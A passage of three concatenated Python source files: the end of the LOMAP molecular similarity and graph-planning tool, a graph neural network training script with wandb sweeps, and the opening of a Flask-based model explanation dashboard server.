This function recovers the total number of molecules currently stored in
the molecule database
"""
return len(self.__list)
def read_mol2_files(self):
"""
Read in all the mol2 files
Returns
-------
molid_list : list of Molecule objects
the container list of all the allocated Molecule objects
"""
# This list is used as container to handle all the molecules read in by using RdKit.
# All the molecules are instances of Molecule class
molid_list = []
# List of molecule that failed to load in
mol_error_list_fn = []
logging.info(30*'-')
# The .mol2 file format is the only one supported so far
mol_fnames = glob.glob(self.options.directory + "/*.mol2" )
mol_fnames.sort()
if (len( mol_fnames ) < 2) :
raise IOError('The directory %s must contain at least two mol2 files' % self.options.directory)
print_cnt = 0
mol_id_cnt = 0
for fname in mol_fnames :
# The RDkit molecule object reads in as mol2 file. The molecule is not sanitized and
# all the hydrogens are kept in place
rdkit_mol = Chem.MolFromMol2File(fname, sanitize=False, removeHs=False)
# Reading problems
if rdkit_mol is None:
logging.warning('Error reading the file: %s' % os.path.basename(fname))
mol_error_list_fn.append(os.path.basename(fname))
continue
# The Rdkit molecule is stored in a Molecule object
mol = Molecule(rdkit_mol, mol_id_cnt ,os.path.basename(fname))
mol_id_cnt +=1
# Cosmetic printing and status
if print_cnt < 15 or print_cnt == (len(mol_fnames) - 1):
logging.info('ID %s\t%s' % (mol.getID(), os.path.basename(fname)))
if print_cnt == 15:
logging.info('ID %s\t%s' % (mol.getID(), os.path.basename(fname)))
logging.info(3*'\t.\t.\n')
print_cnt+= 1
molid_list.append(mol)
logging.info(30*'-')
logging.info('Finished reading input files. %d structures in total....skipped %d\n' % (len(molid_list), len(mol_error_list_fn)))
if mol_error_list_fn:
logging.warning('Skipped molecules:')
logging.warning(30*'-')
for fn in mol_error_list_fn:
logging.warning('%s'% fn)
print(30*'-')
return molid_list
def compute_mtx(self, a, b, strict_mtx, loose_mtx, ecr_mtx, fingerprint = False):
"""
Compute a chunk of the similarity score matrices. The chunk is selected
by the start index a and the final index b. The matrices are
treated as linear arrays
Parameters
----------
a : int
the start index of the chunk
b : int
the final index of the chunk
strict_mtx: python multiprocessing array
strict similarity score matrix. This array is used as shared memory
array managed by the different allocated processes. Each process
operates on a separate chunk selected by the indexes a and b
loose_mtx: python multiprocessing array
loose similarity score matrix. This array is used as shared memory
array managed by the different allocated processes. Each process
operates on a separate chunk selected by the indexes a and b
ecr_mtx: python multiprocessing array
EleCtrostatic Rule (ECR) score matrix. This array is used as shared memory
array managed by the different allocated processes. Each process
operates on a separate chunk selected by the indexes a and b
fingerprint: boolean
use the structural fingerprint to compute the similarity matrix;
not the suggested option, but it currently runs faster than the MCS-based similarity
"""
# name = multiprocessing.current_process().name
# print name
# print 'a = %d, b = %d' % (a,b)
# print '\n'
def ecr(mol_i, mol_j):
"""
This function computes the similarity score between the passed molecules
by using the EleCtrostatic Rule (ECR)
Parameters
----------
mol_i : Rdkit molecule object
the first molecules used to calculate the ECR rule
mol_j : Rdkit molecule object
the second molecules used to calculate the ECR rule
Returns
-------
scr_ecr: float
the calculated similarity score (1 if mol_i and mol_j have the
same total charges, 0 otherwise)
"""
total_charge_mol_i = 0.0
for atom in mol_i.GetAtoms():
total_charge_mol_i += float(atom.GetProp('_TriposPartialCharge'))
total_charge_mol_j = 0.0
for atom in mol_j.GetAtoms():
total_charge_mol_j += float(atom.GetProp('_TriposPartialCharge'))
if abs(total_charge_mol_j - total_charge_mol_i) < 1e-3:
scr_ecr = 1.0
else:
scr_ecr = 0.0
return scr_ecr
# Total number of loaded molecules
n = self.nums()
# Looping over all the elements of the selected matrix chunk
for k in range(a, b+1):
# The linear index k is converted into the row and column indexes of
# an hypothetical bidimensional symmetric matrix
i = int(n - 2 - math.floor(math.sqrt(-8*k + 4*n*(n-1)-7)/2.0 - 0.5))
j = int(k + i + 1 - n*(n-1)/2 + (n-i)*((n-i)-1)/2)
#print 'k = %d , i = %d , j = %d' % (k,i,j)
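# Worked example: with n = 4 molecules, the pairs are stored row by row as
# (0,1)->0, (0,2)->1, (0,3)->2, (1,2)->3, (1,3)->4, (2,3)->5, so the linear
# index k = 4 maps back to (i, j) = (1, 3) via the two formulas above.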
# The Rdkit molecules moli and molj are extracted form the molecule database
moli = self[i].getMolecule()
molj = self[j].getMolecule()
#print 'Processing molecules:\n%s\n%s' % (self[i].getName(),self[j].getName())
# The Electrostatic score rule is calculated
ecr_score = ecr(moli, molj)
# The MCS is computed just if the passed molecules have the same charges
if ecr_score or self.options.ecrscore:
try:
if self.options.verbose == 'pedantic':
logging.info(50*'-')
# Maximum Common Subgraph (MCS) calculation
logging.info('MCS molecules: %s - %s' % (self[i].getName(), self[j].getName()))
if not fingerprint:
MC = mcs.MCS(moli, molj, options=self.options)
else:
#use the fingerprint as similarity calculation
fps_moli = FingerprintMols.FingerprintMol(moli)
fps_molj = FingerprintMols.FingerprintMol(molj)
fps_tan = DataStructs.FingerprintSimilarity(fps_moli, fps_molj)
except Exception as e:
if self.options.verbose == 'pedantic':
logging.warning('Skipping MCS molecules: %s - %s\t\n\n%s' % (self[i].getName(), self[j].getName(), e))
logging.info(50*'-')
continue
else:
continue
if ecr_score == 0.0 and self.options.ecrscore:
logging.critical('WARNING: Mutation between different charge molecules is enabled')
ecr_score = self.options.ecrscore
# The scoring between the two molecules is performed by using different rules.
# The total score will be the product of all the single rules
if not fingerprint:
tmp_scr = ecr_score * MC.mncar() * MC.mcsr()
strict_scr = tmp_scr * MC.tmcsr(strict_flag=True)
loose_scr = tmp_scr * MC.tmcsr(strict_flag=False)
strict_mtx[k] = strict_scr
loose_mtx[k] = loose_scr
ecr_mtx[k] = ecr_score
else:
#for the fingerprint option, currently just use the identical strict and loose mtx
strict_scr = fps_tan
loose_scr = fps_tan
strict_mtx[k] = strict_scr
loose_mtx[k] = loose_scr
ecr_mtx[k] = ecr_score
logging.info('MCS molecules: %s - %s the strict scr is %s' % (self[i].getName(), self[j].getName(), strict_scr))
return
def build_matrices(self):
"""
This function coordinates the calculation of the similarity score matrices
by distributing chunks of the matrices among the allocated processes
"""
logging.info('\nMatrix scoring in progress....\n')
# The similarity score matrices are defined instances of the class SMatrix
# which implements a basic class for symmetric matrices
self.strict_mtx = SMatrix(shape=(self.nums(),))
self.loose_mtx = SMatrix(shape=(self.nums(),))
self.ecr_mtx = SMatrix(shape=(self.nums(),))
# The total number of the effective elements present in the symmetric matrix
l = int(self.nums()*(self.nums() - 1)/2)
if self.options.parallel == 1: # Serial execution
self.compute_mtx(0, l-1, self.strict_mtx, self.loose_mtx, self.ecr_mtx, self.options.fingerprint)
else: # Parallel execution
#add the fingerprint option
fingerprint = self.options.fingerprint
logging.info('Parallel mode is on')
# Number of selected processes
np = self.options.parallel
delta = int(l/np)
rem = l%np
if delta < 1:
kmax = l
else:
kmax = np
proc = []
# Shared memory array used by the different allocated processes
strict_mtx = multiprocessing.Array('d', self.strict_mtx)
loose_mtx = multiprocessing.Array('d', self.loose_mtx)
ecr_mtx = multiprocessing.Array('d', self.ecr_mtx)
# Chop up the index ranges, redistributing the remainder
for k in range(0, kmax):
spc = delta + int(int(rem/(k+1)) > 0)
if k == 0:
i = 0
else:
i = j + 1
if k!= kmax - 1:
j = i + spc - 1
else:
j = l - 1
#print(i,j)
# Python multiprocessing allocation
p = multiprocessing.Process(target=self.compute_mtx , args=(i, j, strict_mtx, loose_mtx, ecr_mtx, fingerprint,))
p.start()
proc.append(p)
# End parallel execution
for p in proc:
p.join()
# Copying back the results
self.strict_mtx[:] = strict_mtx[:]
self.loose_mtx[:] = loose_mtx[:]
self.ecr_mtx[:] = ecr_mtx[:]
return (self.strict_mtx, self.loose_mtx)
def build_graph(self):
"""
This function coordinates the Graph generation
"""
logging.info('\nGenerating graph in progress....')
# The Graph is build from an instance of the Class GraphGen by passing
# the selected user options
Gr = graphgen.GraphGen(self)
# Write the results to files
if self.options.output:
try:
Gr.writeGraph()
pickle_f = open(self.options.name+".pickle", "wb")
pickle.dump(Gr, pickle_f)
except Exception as e:
logging.error(str(e))
# Handle to the the NetworkX generated graph
self.Graph = Gr.getGraph()
#print self.Graph.nodes(data=True)
# Display the graph by using Matplotlib
if self.options.display:
Gr.draw()
return self.Graph
def write_dic(self):
"""
This function write out a text file with the mapping between the
generated molecule indexes and the corresponding molecule file names
"""
try:
file_txt = open(self.options.name+'.txt', 'w')
except Exception:
raise IOError('It was not possible to write out the mapping file')
file_txt.write('#ID\tFileName\n')
for key in self.dic_mapping:
file_txt.write('%d\t%s\n' % (key, self.dic_mapping[key]))
file_txt.close()
#*************************
# Symmetric Class
#*************************
class SMatrix(np.ndarray):
"""
This class implements a "basic" interface for symmetric matrices
subclassing ndarray. The class internally stores the bidimensional
numpy array as a linear array A[k]; however, the user can still
access the matrix elements by using the two-index notation A[i,j]
"""
def __new__(subtype, shape, dtype=float, buffer=None, offset=0, strides=None, order=None):
if len(shape) > 2:
raise ValueError('The matrix shape is greater than two')
elif len(shape) == 2:
if shape[0] != shape[1]:
raise ValueError('The matrix must be a square matrix')
n = shape[0]
l = int(shape[0]*(shape[0] - 1)/2)
shape = (l,)
obj = np.ndarray.__new__(subtype, shape , dtype, buffer, offset, strides, order)
# Array initialization
obj = obj*0.0
return obj
def __getitem__(self, *kargs):
"""
This function retrieves the selected elements i,j from the symmetric
matrix A[i,j]
Parameters
----------
*kargs : python tuples
the passed elements i,j
Returns
-------
: float
the selected element extracted from the allocated linear array
"""
if isinstance( kargs[0], int ):
k = kargs[0]
return super(SMatrix, self).__getitem__(k)
if isinstance( kargs[0], slice ):
k = kargs[0]
return super(SMatrix, self).__getitem__(k)
elif len(kargs[0]) > 2:
raise ValueError('At most two indices can be addressed')
i = kargs[0][0]
j = kargs[0][1]
if i == j:
return 0.0
# Length of the linear array
l = self.size
# Total number of elements in the corresponding bi-dimensional symmetric matrix
n = int((1+math.sqrt(1+8*l))/2)
if i > n - 1:
raise ValueError('First index out of bound')
if j > n - 1:
raise ValueError('Second index out of bound')
if i < j:
k = int((n*(n-1)/2) - (n-i)*((n-i)-1)/2 + j - i - 1)
else:
k = int((n*(n-1)/2) - (n-j)*((n-j)-1)/2 + i - j - 1)
return super(SMatrix, self).__getitem__(k)
def __setitem__(self, *kargs):
"""
This function set the matrix elements i,j to the passed value
Parameters
----------
*kargs : python tuples
the passed elements i,j, value to set
"""
if isinstance( kargs[0], int ):
k = kargs[0]
value = kargs[1]
return super(SMatrix, self).__setitem__(k,value)
elif isinstance(kargs[0], slice):
start, stop, step = kargs[0].indices(len(self))
value = kargs[1]
return super(SMatrix, self).__setitem__(kargs[0],value)
elif len(kargs[0]) > 2:
raise ValueError('At most two indices can be addressed')
# Passed indexes and value to set
i = kargs[0][0]
j = kargs[0][1]
value = kargs[1]
# Length of the linear array
l = self.size
# Total number of elements in the corresponding bi-dimensional symmetric matrix
n = int((1+math.sqrt(1+8*l))/2)
if i > n - 1:
raise ValueError('First index out of bound')
if j > n - 1:
raise ValueError('Second index out of bound')
if i < j:
k = int((n*(n-1)/2) - (n-i)*((n-i)-1)/2 + j - i - 1)
else:
k = int((n*(n-1)/2) - (n-j)*((n-j)-1)/2 + i - j - 1)
super(SMatrix, self).__setitem__(k,value)
def to_numpy_2D_array(self) :
"""
This function returns the symmetric similarity score numpy matrix
generated from the linear array
Returns
-------
np_mat : numpy matrix
the symmetric similarity score numpy matrix built by using the linear
array
"""
# Length of the linear array
l = self.size
# Total number of elements in the corresponding bi-dimensional symmetric matrix
n = int((1+math.sqrt(1+8*l))/2)
np_mat = np.zeros((n,n))
for i in range (0,n):
for j in range(0,n):
np_mat[i,j] = self[i,j]
return np_mat
def mat_size(self) :
"""
This function returns the size of the square similarity score matrix
Returns
-------
n : int
the size of the similarity score matrix
"""
# Length of the linear array
l = self.size
# Total number of elements in the corresponding bi-dimensional symmetric matrix
n = int((1+math.sqrt(1+8*l))/2)
return n
#*************************
# Molecule Class
#*************************
class Molecule(object):
"""
This Class stores the Rdkit molecule objects, their identification number
and the total number of instantiated molecules
"""
# This variable is used to count the current total number of molecules
# The variable is defined as private
__total_molecules = 0
def __init__(self, molecule, mol_id, molname):
"""
Initialization class function
Parameters
----------
molecule : Rdkit molecule object
the molecule
mol_id : int
the molecule identification number
molname : str
the molecule file name
"""
#Check Inputs
if not isinstance(molecule, Chem.rdchem.Mol):
raise ValueError('The passed molecule object is not a RdKit molecule')
if not isinstance(molname, str):
raise ValueError('The passed molecule name must be a string')
# The variable __molecule saves the current RDkit molecule object
# The variable is defined as private
self.__molecule = molecule
# The variable __ID saves the molecule identification number
# The variable is defined as private
self.__ID = mol_id
# The variable __name saves the molecule identification name
# The variable is defined as private
self.__name = molname
def getID(self):
"""
Get the molecule ID number
Returns
-------
: int
the molecule ID number
"""
return self.__ID
def getMolecule(self):
"""
Get the Rdkit molecule object
Returns
-------
mol_copy : Rdkit molecule object
The copy of the RDkit molecule
"""
mol_copy = Chem.Mol(self.__molecule)
return mol_copy
def getName(self):
"""
Get the molecule file name
Returns
-------
: str
the molecule string file name
"""
return self.__name
# Classes used to check some of the passed user options in the main function
# Class used to check the input directory
class check_dir(argparse.Action):
def __call__(self, parser, namespace, directory, option_string=None):
if not os.path.isdir(directory):
raise argparse.ArgumentTypeError('The directory name is not a valid path: %s' % directory)
if os.access(directory, os.R_OK):
setattr(namespace,self.dest, directory)
else:
raise argparse.ArgumentTypeError('The directory name is not readable: %s' % directory)
# Class used to check the parallel, time and max user options
class check_pos(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
if value < 1:
raise argparse.ArgumentTypeError('%s is not a positive integer number' % value)
setattr(namespace, self.dest, value)
# Class used to check the cutoff user option
class check_cutoff(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
if not isinstance(value, float) or value < 0.0:
raise argparse.ArgumentTypeError('%s is not a positive real number' % value)
setattr(namespace, self.dest, value)
# Class used to check the handicap user option
class check_ecrscore(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
if not isinstance(value, float) or value < 0.0 or value > 1.0:
raise argparse.ArgumentTypeError('%s is not a real number in the range [0.0, 1.0]' % value)
setattr(namespace, self.dest, value)
def startup():
# Options and arguments passed by the user
ops= parser.parse_args()
# Molecule DataBase initialized with the passed user options
db_mol = DBMolecules(ops.directory, ops.parallel, ops.verbose, ops.time, ops.ecrscore,
ops.output, ops.name, ops.display, ops.max, ops.cutoff, ops.radial, ops.hub,
ops.fingerprint, ops.fast)
# Similarity score linear array generation
strict, loose = db_mol.build_matrices()
# Get the 2D numpy matrices
# strict.to_numpy_2D_array()
# loose.to_numpy_2D_array()
# Graph generation based on the similarity score matrix
nx_graph = db_mol.build_graph()
# print nx_graph.nodes(data=True)
# print nx_graph.edges(data=True)
# Command line user interface
#----------------------------------------------------------------
parser = argparse.ArgumentParser(description='Lead Optimization Mapper 2. A program to plan alchemical relative binding affinity calculations', prog='LOMAPv1.0')
parser.add_argument('directory', action=check_dir,\
help='The mol2 file directory')
# parser.add_argument('-t', '--time', default=20, action=check_int,type=int,\
# help='Set the maximum time in seconds to perform the mcs search between pair of molecules')
parser.add_argument('-p', '--parallel', default=1, action=check_pos, type=int,\
help='Set the parallel mode. If an integer number N is specified, N processes will be executed to build the similarity matrices')
parser.add_argument('-v', '--verbose', default='info', type=str,\
choices=['off', 'info', 'pedantic'], help='verbose mode selection')
mcs_group = parser.add_argument_group('MCS setting')
mcs_group.add_argument('-t', '--time', default=20, action=check_pos, type=int,\
help='Set the maximum time in seconds to perform the mcs search between pair of molecules')
mcs_group.add_argument('-e', '--ecrscore', default=0.0, action=check_ecrscore, type=float,\
help='If different from 0.0, the value is used to set the electrostatic score between two molecules with different charges')
out_group = parser.add_argument_group('Output setting')
out_group.add_argument('-o', '--output', default=True, action='store_true',\
help='Generates output files')
out_group.add_argument('-n', '--name', type=str, default='out',\
help='File name prefix used to generate the output files')
parser.add_argument('-d', '--display', default=False, action='store_true',\
help='Display the generated graph by using Matplotlib')
graph_group = parser.add_argument_group('Graph setting')
graph_group.add_argument('-m', '--max', default=6, action=check_pos ,type=int,\
help='The maximum distance used to cluster the graph nodes')
graph_group.add_argument('-c', '--cutoff', default=0.4 , action=check_cutoff, type=float,\
help='The Minimum Similarity Score (MSS) used to build the graph')
graph_group.add_argument('-r', '--radial', default=False, action='store_true',\
help='Using the radial option to build the graph')
graph_group.add_argument('-b', '--hub', default= None , type=str,\
help='Using a radial graph approach with a manually specified hub compound')
graph_group.add_argument('-f', '--fingerprint', default=False, action='store_true',\
help='Using the fingerprint option to build similarity matrices')
graph_group.add_argument('-a', '--fast', default=False, action='store_true',\
help='Using the fast graphing when the lead compound is specified')
#------------------------------------------------------------------
# Main function
if ("__main__" == __name__) :
startup()
|
main.py | import argparse
import multiprocessing as mp
import os
import random
import numpy as np
import torch
import torch.optim as optim
import wandb
from ogb.graphproppred import Evaluator
# noinspection PyUnresolvedReferences
from data import SubgraphData
from utils import get_data, get_model, SimpleEvaluator, NonBinaryEvaluator, Evaluator
torch.set_num_threads(1)
def train(model, device, loader, optimizer, criterion, epoch, fold_idx):
model.train()
for step, batch in enumerate(loader):
batch = batch.to(device)
if batch.x.shape[0] == 1 or batch.batch[-1] == 0:
continue
pred = model(batch)
optimizer.zero_grad()
# ignore nan targets (unlabeled) when computing training loss.
is_labeled = batch.y == batch.y
y = batch.y.view(pred.shape).to(torch.float32) if pred.size(-1) == 1 else batch.y
loss = criterion(pred.to(torch.float32)[is_labeled], y[is_labeled])
wandb.log({'Loss/train': loss.item()})
loss.backward()
optimizer.step()
def eval(model, device, loader, evaluator, voting_times=1):
model.eval()
all_y_pred = []
for i in range(voting_times):
y_true = []
y_pred = []
for step, batch in enumerate(loader):
batch = batch.to(device)
if batch.x.shape[0] == 1:
continue
with torch.no_grad():
pred = model(batch)
y = batch.y.view(pred.shape) if pred.size(-1) == 1 else batch.y
y_true.append(y.detach().cpu())
y_pred.append(pred.detach().cpu())
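# Collect this voting round's stacked predictions; the evaluator aggregates
# (e.g. majority-votes) over the list of rounds.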
all_y_pred.append(torch.cat(y_pred, dim=0).unsqueeze(-1).numpy())
y_true = torch.cat(y_true, dim=0).numpy()
input_dict = {"y_true": y_true, "y_pred": all_y_pred}
return evaluator.eval(input_dict)
def reset_wandb_env():
exclude = {
"WANDB_PROJECT",
"WANDB_ENTITY",
"WANDB_API_KEY",
}
for k in list(os.environ):  # copy the keys; deleting while iterating os.environ raises RuntimeError
if k.startswith("WANDB_") and k not in exclude:
del os.environ[k]
def run(args, device, fold_idx, sweep_run_name, sweep_id, results_queue):
# set seed
torch.manual_seed(args.seed)
np.random.seed(args.seed)
random.seed(args.seed)
reset_wandb_env()
run_name = "{}-{}".format(sweep_run_name, fold_idx)
run = wandb.init(
group=sweep_id,
job_type=sweep_run_name,
name=run_name,
config=args,
)
train_loader, train_loader_eval, valid_loader, test_loader, attributes = get_data(args, fold_idx)
in_dim, out_dim, task_type, eval_metric = attributes
if 'ogb' in args.dataset:
evaluator = Evaluator(args.dataset)
else:
evaluator = SimpleEvaluator(task_type) if args.dataset != "IMDB-MULTI" \
and args.dataset != "CSL" else NonBinaryEvaluator(out_dim)
model = get_model(args, in_dim, out_dim, device)
optimizer = optim.Adam(model.parameters(), lr=args.learning_rate)
if 'ZINC' in args.dataset:
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.5, patience=args.patience)
elif 'ogb' in args.dataset:
scheduler = None
else:
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=args.decay_step, gamma=args.decay_rate)
if "classification" in task_type:
criterion = torch.nn.BCEWithLogitsLoss() if args.dataset != "IMDB-MULTI" \
and args.dataset != "CSL" else torch.nn.CrossEntropyLoss()
else:
criterion = torch.nn.L1Loss()
# If sampling, perform majority voting on the outputs of 5 independent samples
voting_times = 5 if args.fraction != 1. else 1
train_curve = []
valid_curve = []
test_curve = []
for epoch in range(1, args.epochs + 1):
train(model, device, train_loader, optimizer, criterion, epoch=epoch, fold_idx=fold_idx)
# Only valid_perf is used for TUD
train_perf = eval(model, device, train_loader_eval, evaluator, voting_times) \
if 'ogb' in args.dataset else {eval_metric: 300.}
valid_perf = eval(model, device, valid_loader, evaluator, voting_times)
test_perf = eval(model, device, test_loader, evaluator, voting_times) \
if 'ogb' in args.dataset or 'ZINC' in args.dataset else {eval_metric: 300.}
if scheduler is not None:
if 'ZINC' in args.dataset:
scheduler.step(valid_perf[eval_metric])
if optimizer.param_groups[0]['lr'] < 0.00001:
break
else:
scheduler.step()
train_curve.append(train_perf[eval_metric])
valid_curve.append(valid_perf[eval_metric])
test_curve.append(test_perf[eval_metric])
run.log(
{
f'Metric/train': train_perf[eval_metric],
f'Metric/valid': valid_perf[eval_metric],
f'Metric/test': test_perf[eval_metric]
}
)
wandb.join()
results_queue.put((train_curve, valid_curve, test_curve))
return
def main():
# Training settings
parser = argparse.ArgumentParser(description='GNN baselines with PyTorch Geometric')
parser.add_argument('--device', type=int, default=0,
help='which gpu to use if any (default: 0)')
parser.add_argument('--gnn_type', type=str,
help='Type of convolution {gin, originalgin, zincgin, graphconv}')
parser.add_argument('--random_ratio', type=float, default=0.,
help='Number of random features, > 0 only for RNI')
parser.add_argument('--model', type=str,
help='Type of model {deepsets, dss, gnn}')
parser.add_argument('--drop_ratio', type=float, default=0.5,
help='dropout ratio (default: 0.5)')
parser.add_argument('--num_layer', type=int, default=5,
help='number of GNN message passing layers (default: 5)')
parser.add_argument('--channels', type=str,
help='String with dimension of each DS layer, separated by "-"'
'(considered only if args.model is deepsets)')
parser.add_argument('--emb_dim', type=int, default=300,
help='dimensionality of hidden units in GNNs (default: 300)')
parser.add_argument('--jk', type=str, default="last",
help='JK strategy, either last or concat (default: last)')
parser.add_argument('--batch_size', type=int, default=32,
help='input batch size for training (default: 32)')
parser.add_argument('--learning_rate', type=float, default=0.01,
help='learning rate for training (default: 0.01)')
parser.add_argument('--decay_rate', type=float, default=0.5,
help='decay rate for training (default: 0.5)')
parser.add_argument('--decay_step', type=int, default=50,
help='decay step for training (default: 50)')
parser.add_argument('--epochs', type=int, default=100,
help='number of epochs to train (default: 100)')
parser.add_argument('--num_workers', type=int, default=0,
help='number of workers (default: 0)')
parser.add_argument('--dataset', type=str, default="ogbg-molhiv",
help='dataset name (default: ogbg-molhiv)')
parser.add_argument('--policy', type=str, default="edge_deleted",
help='Subgraph selection policy in {edge_deleted, node_deleted, ego_nets}'
' (default: edge_deleted)')
parser.add_argument('--num_hops', type=int, default=2,
help='Depth of the ego net if policy is ego_nets (default: 2)')
parser.add_argument('--seed', type=int, default=0,
help='random seed (default: 0)')
parser.add_argument('--fraction', type=float, default=1.0,
help='Fraction of subsampled subgraphs (1.0 means full bag aka no sampling)')
parser.add_argument('--patience', type=int, default=20,
help='patience (default: 20)')
parser.add_argument('--test', action='store_true',
help='quick test')
parser.add_argument('--filename', type=str, default="",
help='filename to output result (default: )')
args = parser.parse_args()
if args.channels is not None:  # the '-'-separated channel spec is only used by deepsets models
args.channels = list(map(int, args.channels.split("-")))
device = torch.device("cuda:" + str(args.device)) if torch.cuda.is_available() else torch.device("cpu")
# set seed
torch.manual_seed(args.seed)
np.random.seed(args.seed)
random.seed(args.seed)
mp.set_start_method('spawn')
sweep_run = wandb.init()
sweep_id = sweep_run.sweep_id or "unknown"
sweep_url = sweep_run.get_sweep_url()
project_url = sweep_run.get_project_url()
sweep_group_url = "{}/groups/{}".format(project_url, sweep_id)
sweep_run.notes = sweep_group_url
sweep_run.save()
sweep_run_name = sweep_run.name or sweep_run.id or "unknown"
if 'ogb' in args.dataset or 'ZINC' in args.dataset:
n_folds = 1
elif 'CSL' in args.dataset:
n_folds = 5
else:
n_folds = 10
# number of processes to run in parallel
# TODO: make it dynamic
if n_folds > 1 and 'REDDIT' not in args.dataset:
if args.dataset == 'PROTEINS':
num_proc = 2
else:
num_proc = 3 if args.batch_size == 128 and args.dataset != 'MUTAG' and args.dataset != 'PTC' else 5
else:
num_proc = 1
if args.dataset in ['CEXP', 'EXP']:
num_proc = 2
if 'IMDB' in args.dataset and args.policy == 'edge_deleted':
num_proc = 1
num_free = num_proc
results_queue = mp.Queue()
curve_folds = []
fold_idx = 0
if args.test:
run(args, device, fold_idx, sweep_run_name, sweep_id, results_queue)
exit()
while len(curve_folds) < n_folds:
if num_free > 0 and fold_idx < n_folds:
p = mp.Process(
target=run, args=(args, device, fold_idx, sweep_run_name, sweep_id, results_queue)
)
fold_idx += 1
num_free -= 1
p.start()
else:
curve_folds.append(results_queue.get())
num_free += 1
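# Simple scheduler: fill up to num_proc worker slots, then each blocking
# results_queue.get() both collects a finished fold and frees a slot for the next one.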
train_curve_folds = np.array([l[0] for l in curve_folds])
valid_curve_folds = np.array([l[1] for l in curve_folds])
test_curve_folds = np.array([l[2] for l in curve_folds])
# compute aggregated curves across folds
train_curve = np.mean(train_curve_folds, 0)
train_accs_std = np.std(train_curve_folds, 0)
valid_curve = np.mean(valid_curve_folds, 0)
valid_accs_std = np.std(valid_curve_folds, 0)
test_curve = np.mean(test_curve_folds, 0)
test_accs_std = np.std(test_curve_folds, 0)
task_type = 'classification' if args.dataset != 'ZINC' else 'regression'
if 'classification' in task_type:
best_val_epoch = np.argmax(valid_curve)
best_train = max(train_curve)
else:
best_val_epoch = len(valid_curve) - 1
best_train = min(train_curve)
sweep_run.summary[f'Metric/train_mean'] = train_curve[best_val_epoch]
sweep_run.summary[f'Metric/valid_mean'] = valid_curve[best_val_epoch]
sweep_run.summary[f'Metric/test_mean'] = test_curve[best_val_epoch]
sweep_run.summary[f'Metric/train_std'] = train_accs_std[best_val_epoch]
sweep_run.summary[f'Metric/valid_std'] = valid_accs_std[best_val_epoch]
sweep_run.summary[f'Metric/test_std'] = test_accs_std[best_val_epoch]
if args.filename != '':
torch.save({'Val': valid_curve[best_val_epoch], 'Val std': valid_accs_std[best_val_epoch],
'Test': test_curve[best_val_epoch], 'Test std': test_accs_std[best_val_epoch],
'Train': train_curve[best_val_epoch], 'Train std': train_accs_std[best_val_epoch],
'BestTrain': best_train}, args.filename)
wandb.join()
if __name__ == "__main__":
main()
|
explanation_dashboard.py | from flask import Flask, request
from flask_cors import CORS
from jinja2 import Environment, PackageLoader
from IPython.display import display, HTML
from interpret.utils.environment import EnvironmentDetector, is_cloud_env
import threading
import socket
import requests
import re
import os
import json
import atexit
from .explanation_dashboard_input import ExplanationDashboardInput
from ._internal.constants import DatabricksInterfaceConstants
try:
from gevent.pywsgi import WSGIServer
except ModuleNotFoundError:
raise RuntimeError("Error: gevent package is missing, please run 'conda install gevent' or"
"'pip install gevent' or 'pip install interpret-community[visualization]'")
class ExplanationDashboard:
"""Explanation Dashboard Class.
:param explanation: An object that represents an explanation.
:type explanation: ExplanationMixin
:param model: An object that represents a model. It is assumed that for the classification case
it has a method of predict_proba() returning the prediction probabilities for each
class and for the regression case a method of predict() returning the prediction value.
:type model: object
:param dataset: A matrix of feature vector examples (# examples x # features), the same samples
used to build the explanation. Overwrites any existing dataset on the explanation object. Must have fewer than
10000 rows and fewer than 1000 columns.
:type dataset: numpy.array or list[][]
:param datasetX: Alias of the dataset parameter. If dataset is passed, this will have no effect. Must have fewer
than 10000 rows and fewer than 1000 columns.
:type datasetX: numpy.array or list[][]
:param true_y: The true labels for the provided dataset. Overwrites any existing dataset on the
explanation object.
:type true_y: numpy.array or list[]
:param classes: The class names.
:type classes: numpy.array or list[]
:param features: Feature names.
:type features: numpy.array or list[]
:param port: The port to use on locally hosted service.
:type port: int
:param use_cdn: Whether to load latest dashboard script from cdn, fall back to local script if False.
:type use_cdn: bool
"""
service = None
explanations = {}
model_count = 0
using_fallback = False
_cdn_path = "v0.3.js"
_dashboard_js = None
env = Environment(loader=PackageLoader(__name__, 'templates'))
default_template = env.get_template("inlineDashboard.html")
class DashboardService:
app = Flask(__name__)
CORS(app)
def __init__(self, port):
self.port = port
self.ip = 'localhost'
self.env = "local"
self.use_cdn = True
if self.port is None:
# Try 100 different ports
for port in range(5000, 5100):
available = ExplanationDashboard.DashboardService._local_port_available(self.ip, port, raise_error=False)
if available:
self.port = port
return
error_message = """Ports 5000 to 5100 not available.
Please specify an open port for use via the 'port' parameter"""
raise RuntimeError(
error_message.format(port)
)
else:
ExplanationDashboard.DashboardService._local_port_available(self.ip, self.port)
def run(self):
class devnull:
write = lambda _: None # noqa: E731
server = WSGIServer((self.ip, self.port), self.app, log=devnull)
self.app.config["server"] = server
server.serve_forever()
# Closes server on program exit, including freeing all sockets
def closeserver():
server.stop()
atexit.register(closeserver)
def get_base_url(self):
env = EnvironmentDetector()
detected_envs = env.detect()
in_cloud_env = is_cloud_env(detected_envs)
# First handle known cloud environments
nbvm_file_path = "/mnt/azmnt/.nbvm"
if not (os.path.exists(nbvm_file_path) and os.path.isfile(nbvm_file_path)):
if not in_cloud_env:
return "http://{0}:{1}".format(
self.ip,
self.port)
# all non-specified cloud environments are not handled
self.env = "cloud"
return None
self.env = "cloud"
# regex to find items of the form key=value where value will be part of a url
# the keys of interest to us are "instance" and "domainsuffix"
envre = re.compile(r'''^([^\s=]+)=(?:[\s"']*)(.+?)(?:[\s"']*)$''')
result = {}
with open(nbvm_file_path) as nbvm_variables:
for line in nbvm_variables:
match = envre.match(line)
if match is not None:
result[match.group(1)] = match.group(2)
if "instance" not in result or "domainsuffix" not in result:
return None
self.env = "azure"
instance_name = result["instance"]
domain_suffix = result["domainsuffix"]
return "https://{}-{}.{}".format(instance_name, self.port, domain_suffix)
@staticmethod
def _local_port_available(ip, port, raise_error=True):
"""
Borrowed from:
https://stackoverflow.com/questions/19196105/how-to-check-if-a-network-port-is-open-on-linux
"""
try:
backlog = 5
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((ip, port))
sock.listen(backlog)
sock.close()
except socket.error: # pragma: no cover
if raise_error:
error_message = """Port {0} is not available.
